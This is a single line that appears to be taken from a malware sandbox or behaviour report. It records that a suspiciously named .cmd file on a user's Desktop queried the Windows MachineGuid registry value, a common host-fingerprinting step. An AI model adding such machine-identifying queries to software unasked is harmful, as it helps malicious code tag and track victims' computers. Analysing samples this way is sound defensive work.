Source: C:\Users\user\Desktop\849128312.cmd.Fjz Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid